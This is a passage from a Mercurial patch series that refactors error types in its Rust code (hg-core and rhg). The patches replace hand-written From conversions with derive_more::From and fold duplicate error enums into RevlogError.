IntoIterator<Item = &'a HgPath>, ) -> Result<(), CommandError> { let cwd = std::env::current_dir() - .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?; + .or_else(|e| Err(CommandError::CurrentDirNotFound(e)))?; let rooted_cwd = cwd .strip_prefix(repo.working_directory_path()) .expect("cwd was already checked within the repository"); @@ -68,75 +63,65 @@ } } -/// Convert `ListRevTrackedFilesErrorKind` to `CommandError` +/// Convert `ListRevTrackedFilesError` to `CommandError` fn map_rev_error(rev: &str, err: ListRevTrackedFilesError) -> CommandError { - CommandError { - kind: match err.kind { - ListRevTrackedFilesErrorKind::IoError(err) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), + match err { + ListRevTrackedFilesError::IoError(err) => CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )), + ListRevTrackedFilesError::InvalidRevision => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier {}\n", + rev )) - } - ListRevTrackedFilesErrorKind::InvalidRevision => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesErrorKind::AmbiguousPrefix => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), + .into(), + )) + } + ListRevTrackedFilesError::AmbiguousPrefix => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier {}\n", + rev )) - } - ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), + .into(), + )) + } + ListRevTrackedFilesError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unsupported revlog version {}\n", + version )) - } - 
ListRevTrackedFilesErrorKind::CorruptedRevlog => { - CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), + .into(), + )) + } + ListRevTrackedFilesError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + ListRevTrackedFilesError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unknow revlog dataformat {:?}\n", + format )) - } - ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - }, + .into(), + )) + } } } /// Convert `ListDirstateTrackedFilesError` to `CommandError` fn map_dirstate_error(err: ListDirstateTrackedFilesError) -> CommandError { - CommandError { - kind: match err.kind { - ListDirstateTrackedFilesErrorKind::IoError(err) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )) - } - ListDirstateTrackedFilesErrorKind::ParseError(_) => { - CommandErrorKind::Abort(Some( - // TODO find a better error message - b"abort: parse error\n".to_vec(), - )) - } - }, + match err { + ListDirstateTrackedFilesError::IoError(err) => CommandError::Abort( + Some(utf8_to_local(&format!("abort: {}\n", err)).into()), + ), + ListDirstateTrackedFilesError::ParseError(_) => { + CommandError::Abort(Some( + // TODO find a better error message + b"abort: parse error\n".to_vec(), + )) + } } } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,7 +1,7 @@ use crate::exitcode; use crate::ui::UiError; use format_bytes::format_bytes; -use hg::operations::{FindRootError, FindRootErrorKind}; +use hg::operations::FindRootError; use hg::requirements::RequirementsError; use hg::utils::files::get_bytes_from_path; use std::convert::From; @@ -9,7 +9,7 @@ /// The kind of command error #[derive(Debug)] -pub enum CommandErrorKind { +pub 
enum CommandError { /// The root of the repository cannot be found RootNotFound(PathBuf), /// The current directory cannot be found @@ -26,99 +26,76 @@ Unimplemented, } -impl CommandErrorKind { +impl CommandError { pub fn get_exit_code(&self) -> exitcode::ExitCode { match self { - CommandErrorKind::RootNotFound(_) => exitcode::ABORT, - CommandErrorKind::CurrentDirNotFound(_) => exitcode::ABORT, - CommandErrorKind::RequirementsError( + CommandError::RootNotFound(_) => exitcode::ABORT, + CommandError::CurrentDirNotFound(_) => exitcode::ABORT, + CommandError::RequirementsError( RequirementsError::Unsupported { .. }, ) => exitcode::UNIMPLEMENTED_COMMAND, - CommandErrorKind::RequirementsError(_) => exitcode::ABORT, - CommandErrorKind::StdoutError => exitcode::ABORT, - CommandErrorKind::StderrError => exitcode::ABORT, - CommandErrorKind::Abort(_) => exitcode::ABORT, - CommandErrorKind::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND, + CommandError::RequirementsError(_) => exitcode::ABORT, + CommandError::StdoutError => exitcode::ABORT, + CommandError::StderrError => exitcode::ABORT, + CommandError::Abort(_) => exitcode::ABORT, + CommandError::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND, } } - /// Return the message corresponding to the error kind if any + /// Return the message corresponding to the error if any pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> { match self { - CommandErrorKind::RootNotFound(path) => { + CommandError::RootNotFound(path) => { let bytes = get_bytes_from_path(path); Some(format_bytes!( b"abort: no repository found in '{}' (.hg not found)!\n", bytes.as_slice() )) } - CommandErrorKind::CurrentDirNotFound(e) => Some(format_bytes!( + CommandError::CurrentDirNotFound(e) => Some(format_bytes!( b"abort: error getting current working directory: {}\n", e.to_string().as_bytes(), )), - CommandErrorKind::RequirementsError( - RequirementsError::Corrupted, - ) => Some( - "abort: .hg/requires is corrupted\n".as_bytes().to_owned(), - ), - 
CommandErrorKind::Abort(message) => message.to_owned(), + CommandError::RequirementsError(RequirementsError::Corrupted) => { + Some( + "abort: .hg/requires is corrupted\n".as_bytes().to_owned(), + ) + } + CommandError::Abort(message) => message.to_owned(), _ => None, } } -} -/// The error type for the Command trait -#[derive(Debug)] -pub struct CommandError { - pub kind: CommandErrorKind, -} - -impl CommandError { /// Exist the process with the corresponding exit code. pub fn exit(&self) { - std::process::exit(self.kind.get_exit_code()) - } - - /// Return the message corresponding to the command error if any - pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> { - self.kind.get_error_message_bytes() - } -} - -impl From<CommandErrorKind> for CommandError { - fn from(kind: CommandErrorKind) -> Self { - CommandError { kind } + std::process::exit(self.get_exit_code()) } } impl From<UiError> for CommandError { fn from(error: UiError) -> Self { - CommandError { - kind: match error { - UiError::StdoutError(_) => CommandErrorKind::StdoutError, - UiError::StderrError(_) => CommandErrorKind::StderrError, - }, + match error { + UiError::StdoutError(_) => CommandError::StdoutError, + UiError::StderrError(_) => CommandError::StderrError, } } } impl From<FindRootError> for CommandError { fn from(err: FindRootError) -> Self { - match err.kind { - FindRootErrorKind::RootNotFound(path) => CommandError { - kind: CommandErrorKind::RootNotFound(path), - }, - FindRootErrorKind::GetCurrentDirError(e) => CommandError { - kind: CommandErrorKind::CurrentDirNotFound(e), - }, + match err { + FindRootError::RootNotFound(path) => { + CommandError::RootNotFound(path) + } + FindRootError::GetCurrentDirError(e) => { + CommandError::CurrentDirNotFound(e) + } } } } impl From<RequirementsError> for CommandError { fn from(err: RequirementsError) -> Self { - CommandError { - kind: CommandErrorKind::RequirementsError(err), - } + CommandError::RequirementsError(err) } } # HG changeset patch # User 
Simon Sapin <simon.sapin@octobus.net> # Date 1611687937 -3600 # Tue Jan 26 20:05:37 2021 +0100 # Node ID 2e20330812742fb88947823bcd9f1f658f30d396 # Parent 3e2d539d0d1a6390677c2d18bb8aa4fe241a8ae2 rust: replace trivial `impl From …` with `#[derive(derive_more::From)]` Crate docs: https://jeltef.github.io/derive_more/derive_more/from.html Differential Revision: https://phab.mercurial-scm.org/D9875 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -199,6 +199,16 @@ ] [[package]] +name = "derive_more" +version = "0.99.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", + "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", + "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "difference" version = "2.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -293,6 +303,7 @@ "bytes-cast 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)", "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", + "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", @@ -696,6 +707,7 @@ version = "0.1.0" dependencies = [ "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", + "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", "hg-core 0.1.0", @@ -939,6 +951,7 @@ "checksum crossbeam-utils 0.7.2 
(registry+https://github.com/rust-lang/crates.io-index)" = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8" "checksum crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)" = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d" "checksum ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)" = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484" +"checksum derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)" = "41cb0e6161ad61ed084a36ba71fbba9e3ac5aee3606fb607fe08da6acbcf3d8c" "checksum difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198" "checksum either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" "checksum env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)" = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -11,6 +11,7 @@ [dependencies] bytes-cast = "0.1" byteorder = "1.3.4" +derive_more = "0.99" im-rc = "15.0.*" lazy_static = "1.4.0" memchr = "2.3.3" diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -226,7 +226,7 @@ } } -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum ConfigError { Parse { origin: ConfigOrigin, @@ -239,15 +239,10 @@ io_error: std::io::Error, }, /// Any IO error that isn't expected + #[from] IO(std::io::Error), } -impl From<std::io::Error> for ConfigError { - fn from(e: std::io::Error) -> Self { - Self::IO(e) - } -} - fn make_regex(pattern: &'static str) -> Regex { Regex::new(pattern).expect("expected a valid regex") } diff --git a/rust/hg-core/src/dirstate/status.rs 
b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -265,7 +265,7 @@ pub traversed: Vec<HgPathBuf>, } -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum StatusError { /// Generic IO error IO(std::io::Error), @@ -277,22 +277,6 @@ pub type StatusResult<T> = Result<T, StatusError>; -impl From<PatternError> for StatusError { - fn from(e: PatternError) -> Self { - StatusError::Pattern(e) - } -} -impl From<HgPathError> for StatusError { - fn from(e: HgPathError) -> Self { - StatusError::Path(e) - } -} -impl From<std::io::Error> for StatusError { - fn from(e: std::io::Error) -> Self { - StatusError::IO(e) - } -} - impl ToString for StatusError { fn to_string(&self) -> String { match self { diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -89,6 +89,7 @@ DirstatePackError::CorruptedEntry(e.to_string()) } } + #[derive(Debug, PartialEq)] pub enum DirstateMapError { PathNotFound(HgPathBuf), @@ -108,7 +109,7 @@ } } -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum DirstateError { Parse(DirstateParseError), Pack(DirstatePackError), @@ -116,24 +117,14 @@ IO(std::io::Error), } -impl From<DirstateParseError> for DirstateError { - fn from(e: DirstateParseError) -> Self { - DirstateError::Parse(e) - } -} - -impl From<DirstatePackError> for DirstateError { - fn from(e: DirstatePackError) -> Self { - DirstateError::Pack(e) - } -} - -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum PatternError { + #[from] Path(HgPathError), UnsupportedSyntax(String), UnsupportedSyntaxInFile(String, String, usize), TooLong(usize), + #[from] IO(std::io::Error), /// Needed a pattern that can be turned into a regex but got one that /// can't. This should only happen through programmer error. 
@@ -163,27 +154,3 @@ } } } - -impl From<DirstateMapError> for DirstateError { - fn from(e: DirstateMapError) -> Self { - DirstateError::Map(e) - } -} - -impl From<std::io::Error> for DirstateError { - fn from(e: std::io::Error) -> Self { - DirstateError::IO(e) - } -} - -impl From<std::io::Error> for PatternError { - fn from(e: std::io::Error) -> Self { - PatternError::IO(e) - } -} - -impl From<HgPathError> for PatternError { - fn from(e: HgPathError) -> Self { - PatternError::Path(e) - } -} diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -16,9 +16,10 @@ } /// Error type for `debug_data` -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum DebugDataError { /// Error when reading a `revlog` file. + #[from] IoError(std::io::Error), /// The revision has not been found. InvalidRevision, @@ -32,12 +33,6 @@ UnknowRevlogDataFormat(u8), } -impl From<std::io::Error> for DebugDataError { - fn from(err: std::io::Error) -> Self { - DebugDataError::IoError(err) - } -} - impl From<RevlogError> for DebugDataError { fn from(err: RevlogError) -> Self { match err { diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -17,7 +17,7 @@ use std::convert::From; /// Error type for `Dirstate` methods -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum ListDirstateTrackedFilesError { /// Error when reading the `dirstate` file IoError(std::io::Error), @@ -25,12 +25,6 @@ ParseError(DirstateParseError), } -impl From<std::io::Error> for ListDirstateTrackedFilesError { - fn from(err: std::io::Error) -> Self { - ListDirstateTrackedFilesError::IoError(err) - } -} - /// List files under Mercurial control in the working directory /// by reading the dirstate pub 
struct Dirstate { diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -49,7 +49,7 @@ /// the size or return an error at runtime. /// /// [`nybbles_len`]: #method.nybbles_len -#[derive(Copy, Clone, Debug, PartialEq, BytesCast)] +#[derive(Copy, Clone, Debug, PartialEq, BytesCast, derive_more::From)] #[repr(transparent)] pub struct Node { data: NodeData, @@ -60,12 +60,6 @@ data: [0; NODE_BYTES_LENGTH], }; -impl From<NodeData> for Node { - fn from(data: NodeData) -> Node { - Node { data } - } -} - /// Return an error if the slice has an unexpected length impl<'a> TryFrom<&'a [u8]> for &'a Node { type Error = (); diff --git a/rust/hg-core/src/utils/hg_path.rs b/rust/hg-core/src/utils/hg_path.rs --- a/rust/hg-core/src/utils/hg_path.rs +++ b/rust/hg-core/src/utils/hg_path.rs @@ -367,7 +367,9 @@ } } -#[derive(Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash)] +#[derive( + Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash, derive_more::From, +)] pub struct HgPathBuf { inner: Vec<u8>, } @@ -408,12 +410,6 @@ } } -impl From<Vec<u8>> for HgPathBuf { - fn from(vec: Vec<u8>) -> Self { - Self { inner: vec } - } -} - impl<T: ?Sized + AsRef<HgPath>> From<&T> for HgPathBuf { fn from(s: &T) -> HgPathBuf { s.as_ref().to_owned() diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -10,6 +10,7 @@ [dependencies] hg-core = { path = "../hg-core"} clap = "2.33.1" +derive_more = "0.99" log = "0.4.11" micro-timer = "0.3.1" env_logger = "0.7.1" diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -8,13 +8,14 @@ use std::path::PathBuf; /// The kind of command error -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum CommandError { /// The root of the repository cannot be found RootNotFound(PathBuf), /// The current directory cannot be found 
CurrentDirNotFound(std::io::Error), /// `.hg/requires` + #[from] RequirementsError(RequirementsError), /// The standard output stream cannot be written to StdoutError, @@ -93,9 +94,3 @@ } } } - -impl From<RequirementsError> for CommandError { - fn from(err: RequirementsError) -> Self { - CommandError::RequirementsError(err) - } -} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611689486 -3600 # Tue Jan 26 20:31:26 2021 +0100 # Node ID 252d1bdba33d0cb9e491b766dfbe640de4ea864e # Parent 2e20330812742fb88947823bcd9f1f658f30d396 rhg: replace `map_*_error` functions with `From` impls Differential Revision: https://phab.mercurial-scm.org/D9876 diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,8 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; -use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{cat, CatRevError}; +use hg::operations::cat; use hg::repo::Repo; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; @@ -49,55 +48,10 @@ match self.rev { Some(rev) => { - let data = cat(&repo, rev, &files) - .map_err(|e| map_rev_error(rev, e))?; + let data = cat(&repo, rev, &files).map_err(|e| (e, rev))?; self.display(ui, &data) } None => Err(CommandError::Unimplemented.into()), } } } - -/// Convert `CatRevError` to `CommandError` -fn map_rev_error(rev: &str, err: CatRevError) -> CommandError { - match err { - CatRevError::IoError(err) => CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - CatRevError::InvalidRevision => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )), - CatRevError::AmbiguousPrefix => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )), - CatRevError::UnsuportedRevlogVersion(version) => { - 
CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - CatRevError::CorruptedRevlog => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - CatRevError::UnknowRevlogDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - } -} diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -1,8 +1,7 @@ use crate::commands::Command; use crate::error::CommandError; -use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{debug_data, DebugDataError, DebugDataKind}; +use hg::operations::{debug_data, DebugDataKind}; use hg::repo::Repo; use micro_timer::timed; @@ -26,7 +25,7 @@ fn run(&self, ui: &Ui) -> Result<(), CommandError> { let repo = Repo::find()?; let data = debug_data(&repo, self.rev, self.kind) - .map_err(|e| to_command_error(self.rev, e))?; + .map_err(|e| (e, self.rev))?; let mut stdout = ui.stdout_buffer(); stdout.write_all(&data)?; @@ -35,47 +34,3 @@ Ok(()) } } - -/// Convert operation errors to command errors -fn to_command_error(rev: &str, err: DebugDataError) -> CommandError { - match err { - DebugDataError::IoError(err) => CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - DebugDataError::InvalidRevision => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier{}\n", - rev - )) - .into(), - )), - DebugDataError::AmbiguousPrefix => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier{}\n", - rev - )) - .into(), - )), - DebugDataError::UnsuportedRevlogVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - 
DebugDataError::CorruptedRevlog => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - DebugDataError::UnknowRevlogDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - } -} diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -1,9 +1,8 @@ use crate::commands::Command; use crate::error::CommandError; -use crate::ui::utf8_to_local; use crate::ui::Ui; -use hg::operations::{list_rev_tracked_files, ListRevTrackedFilesError}; -use hg::operations::{Dirstate, ListDirstateTrackedFilesError}; +use hg::operations::list_rev_tracked_files; +use hg::operations::Dirstate; use hg::repo::Repo; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; @@ -52,76 +51,13 @@ let repo = Repo::find()?; repo.check_requirements()?; if let Some(rev) = self.rev { - let files = list_rev_tracked_files(&repo, rev) - .map_err(|e| map_rev_error(rev, e))?; + let files = + list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; self.display_files(ui, &repo, files.iter()) } else { - let distate = Dirstate::new(&repo).map_err(map_dirstate_error)?; - let files = distate.tracked_files().map_err(map_dirstate_error)?; + let distate = Dirstate::new(&repo)?; + let files = distate.tracked_files()?; self.display_files(ui, &repo, files) } } } - -/// Convert `ListRevTrackedFilesError` to `CommandError` -fn map_rev_error(rev: &str, err: ListRevTrackedFilesError) -> CommandError { - match err { - ListRevTrackedFilesError::IoError(err) => CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - ListRevTrackedFilesError::InvalidRevision => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesError::AmbiguousPrefix 
=> { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesError::UnsuportedRevlogVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - ListRevTrackedFilesError::CorruptedRevlog => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - ListRevTrackedFilesError::UnknowRevlogDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - } -} - -/// Convert `ListDirstateTrackedFilesError` to `CommandError` -fn map_dirstate_error(err: ListDirstateTrackedFilesError) -> CommandError { - match err { - ListDirstateTrackedFilesError::IoError(err) => CommandError::Abort( - Some(utf8_to_local(&format!("abort: {}\n", err)).into()), - ), - ListDirstateTrackedFilesError::ParseError(_) => { - CommandError::Abort(Some( - // TODO find a better error message - b"abort: parse error\n".to_vec(), - )) - } - } -} diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,7 +1,11 @@ use crate::exitcode; +use crate::ui::utf8_to_local; use crate::ui::UiError; use format_bytes::format_bytes; -use hg::operations::FindRootError; +use hg::operations::{ + CatRevError, DebugDataError, FindRootError, ListDirstateTrackedFilesError, + ListRevTrackedFilesError, +}; use hg::requirements::RequirementsError; use hg::utils::files::get_bytes_from_path; use std::convert::From; @@ -94,3 +98,160 @@ } } } + +impl From<(DebugDataError, &str)> for CommandError { + fn from((err, rev): (DebugDataError, &str)) -> CommandError { + match err { + DebugDataError::IoError(err) => CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )), + DebugDataError::InvalidRevision => CommandError::Abort(Some( + 
utf8_to_local(&format!( + "abort: invalid revision identifier{}\n", + rev + )) + .into(), + )), + DebugDataError::AmbiguousPrefix => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier{}\n", + rev + )) + .into(), + )), + DebugDataError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unsupported revlog version {}\n", + version + )) + .into(), + )) + } + DebugDataError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + DebugDataError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unknow revlog dataformat {:?}\n", + format + )) + .into(), + )) + } + } + } +} + +impl From<(ListRevTrackedFilesError, &str)> for CommandError { + fn from((err, rev): (ListRevTrackedFilesError, &str)) -> CommandError { + match err { + ListRevTrackedFilesError::IoError(err) => CommandError::Abort( + Some(utf8_to_local(&format!("abort: {}\n", err)).into()), + ), + ListRevTrackedFilesError::InvalidRevision => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier {}\n", + rev + )) + .into(), + )) + } + ListRevTrackedFilesError::AmbiguousPrefix => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier {}\n", + rev + )) + .into(), + )) + } + ListRevTrackedFilesError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unsupported revlog version {}\n", + version + )) + .into(), + )) + } + ListRevTrackedFilesError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + ListRevTrackedFilesError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unknow revlog dataformat {:?}\n", + format + )) + .into(), + )) + } + } + } +} + +impl From<(CatRevError, &str)> for CommandError { + fn from((err, rev): 
(CatRevError, &str)) -> CommandError { + match err { + CatRevError::IoError(err) => CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )), + CatRevError::InvalidRevision => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: invalid revision identifier {}\n", + rev + )) + .into(), + )), + CatRevError::AmbiguousPrefix => CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: ambiguous revision identifier {}\n", + rev + )) + .into(), + )), + CatRevError::UnsuportedRevlogVersion(version) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unsupported revlog version {}\n", + version + )) + .into(), + )) + } + CatRevError::CorruptedRevlog => { + CommandError::Abort(Some("abort: corrupted revlog\n".into())) + } + CatRevError::UnknowRevlogDataFormat(format) => { + CommandError::Abort(Some( + utf8_to_local(&format!( + "abort: unknow revlog dataformat {:?}\n", + format + )) + .into(), + )) + } + } + } +} + +impl From<ListDirstateTrackedFilesError> for CommandError { + fn from(err: ListDirstateTrackedFilesError) -> Self { + match err { + ListDirstateTrackedFilesError::IoError(err) => { + CommandError::Abort(Some( + utf8_to_local(&format!("abort: {}\n", err)).into(), + )) + } + ListDirstateTrackedFilesError::ParseError(_) => { + CommandError::Abort(Some( + // TODO find a better error message + b"abort: parse error\n".to_vec(), + )) + } + } + } +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611690156 -3600 # Tue Jan 26 20:42:36 2021 +0100 # Node ID b274aa2f20fd61b272a004d367a3ae10ece72716 # Parent 252d1bdba33d0cb9e491b766dfbe640de4ea864e rust: remove three enums that were identical to `RevlogError` Differential Revision: https://phab.mercurial-scm.org/D9877 diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -5,7 +5,6 @@ // This software may be used and distributed 
according to the terms of the // GNU General Public License version 2 or any later version. -use std::convert::From; use std::path::PathBuf; use crate::repo::Repo; @@ -20,40 +19,6 @@ const METADATA_DELIMITER: [u8; 2] = [b'\x01', b'\n']; -/// Error type for `cat` -#[derive(Debug)] -pub enum CatRevError { - /// Error when reading a `revlog` file. - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -impl From<RevlogError> for CatRevError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => CatRevError::IoError(err), - RevlogError::UnsuportedVersion(version) => { - CatRevError::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => CatRevError::InvalidRevision, - RevlogError::AmbiguousPrefix => CatRevError::AmbiguousPrefix, - RevlogError::Corrupted => CatRevError::CorruptedRevlog, - RevlogError::UnknowDataFormat(format) => { - 